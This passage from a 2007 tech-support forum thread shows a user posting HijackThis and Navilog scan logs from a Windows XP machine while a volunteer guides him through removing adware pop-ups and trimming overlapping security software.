C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exeO23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exeO23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exeO23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 14294 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 5, 2007 ID:6021 Share Posted July 5, 2007 Please download Navilog1 by IL-MAFIOSO:http://perso.orange.fr/il.mafioso/Navifix/Navilog1.zipExtract its contents to the desktop.Double click on navilog1.exe to install it on your computer.When the installation is complete, the tool will start automatically.If it doesn't start automatically, please double click on Navilog1 shortcut on your desktop to run it.Press E for English from the language Menu.Type 1 in the next Menu to select Search and press Enter.Wait for the Scan to finish (It may take a reasonable amount of time)Press any key as requested .A new document will be produced: fixnavi.txt.Please copy/paste the contents of this report in your next reply.The report is also saved in the root of the directory, "%SystemDrive%\fixnavi.txt". (usually C:\fixnavi.txt) Link to post Share on other sites More sharing options...
John Posted July 6, 2007 Author ID:6035 Share Posted July 6, 2007 Here is the navilog scan results:Search Navipromo version 2.0.5 began on Thu 07/05/2007 at 21:39:13.29!!! Warning, this report may include legitimate files/programs !!!!!! Post this report on the forum you are being helped !!!!!! Don't continue with removal unless instructed by an authorized helper !!!Fix running from C:\Program Files\navilog1Updated on 01.07.2007 at 12h00 by IL-MAFIOSODone in normal mode*** Searching for installed Software *** *** Search folders in C:\WINDOWS ****** Search folders in C:\Program Files ****** Search folders in C:\Documents and Settings\All Users\Application Data ****** Search folders in C:\Documents and Settings\Dad\Application Data ****** Search with BlackLight Engine/F-secure ***BlackLight Engine is a product of F-secure, for more info:http://www.f-secure.com/blacklight/blacklight_help.htmlF-SECURE BLACKLIGHT ROOTKIT ELIMINATOR======================================Copyright 2005-2006 F-Secure Corporation. All rights reserved.This is a beta version. It will expire on 1st of October, 2007.Version information: 2.2.1064.[+] Started on 07/05/07 at 21:39:15.[+] Initializing ...[+] Starting scan, press Ctrl-C to abort.[+] Scanning for hidden items ....................................................................................................................[+] Scan complete.[+] Summary: 0 hidden item(s) found, 0 scheduled for renaming.[+] Exited on 07/05/07 at 21:53:44 (return code = 0).*** Search files *** C:\WINDOWS\pack.epk found !*** Search registry keys ***Search in [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs] Search in [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage] Search Magic Control Key*** Complementary Search *** (Search specifics files) 1)Search known files:2)Heuristic Search :* ** *** **** ***** ****** ******* ******** 3)Certificates Search :Certificate Egroup found !*** Search completed on Thu 07/05/2007 at 21:54:27.64 *** Link to post Share on other sites More sharing options...
John Posted July 7, 2007 Author ID:6068 Share Posted July 7, 2007 Hey there,You have got a load on that system that may very well force my own personal hotrod PC here to puke out.Even if malware is still in there,its fighting a losing battle for memory access. You gotta get yourself down to a single Antivirus and Firewall.If Symantec is broke or expired,lost it.If CA Internet Security Suite is a trial,then keep it until trial is out and lose AVG for now.AOL Spyware,Windows Defender and whatever else arent needed if you keep CA as it has PestPatrol included.You have items in startup that also uneeded and can be accesses when they are needed through All Programs or Desktop Shortcuts.If you are unfamiliar with msconfig,then maybe rock or i can walk you through that part.After you have uninstalled all uneeded items,lets peek at a fresh HijackThis log.Still waiting for therock to take a look at my Navilog results.Dumped AOL Spyware, Windows Defender & AVG for now. CA Internet Suite- I only have CA Spyware installed. As far as I know the only firewall I have is Windows firewall.Could use some help with msconfig Here is an updated HJT log:Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 10:55:02 PM, on 7/6/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\wanmpsvc.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Common Files\AOL\1154100068\ee\aolsoftware.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\iPod\bin\iPodService.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\Program Files\Messenger\msmsgs.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Digital Line Detect\DLG.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Norton AntiVirus\navapsvc.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankO1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exe (file missing)O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 11909 bytes Link to post Share on other sites More sharing options...
therock247uk Posted July 10, 2007 ID:6192 Share Posted July 10, 2007 Open Hijackthis and click scan. Then check mark the following entriesR0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blankO4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')Now close all open windows except Hijackthis and click fix checkedThen post a new Hijackthis log here in a reply. Link to post Share on other sites More sharing options...
John Posted July 11, 2007 Author ID:6200 Share Posted July 11, 2007 I seem to be finally rid of AVSystemCare & other annoying pop ups! Now I'm down to a performance issue. Some of my user accounts on the PC take excessive time to boot up and individual programs are slow to start. One account freezes my PC when shutting down.Here's my latest HJT log after following your latest suggestion. Rock, thanks for sticking with me on this.Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 10:20:04 PM, on 7/10/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\Program Files\Messenger\msmsgs.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Digital Line Detect\DLG.exeC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\Program Files\iPod\bin\iPodService.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Microsoft Money\System\urlmap.exeC:\WINDOWS\system32\wuauclt.exeC:\Program Files\internet explorer\iexplore.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896O1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartupO4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /backgroundO4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exeO4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeO4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - 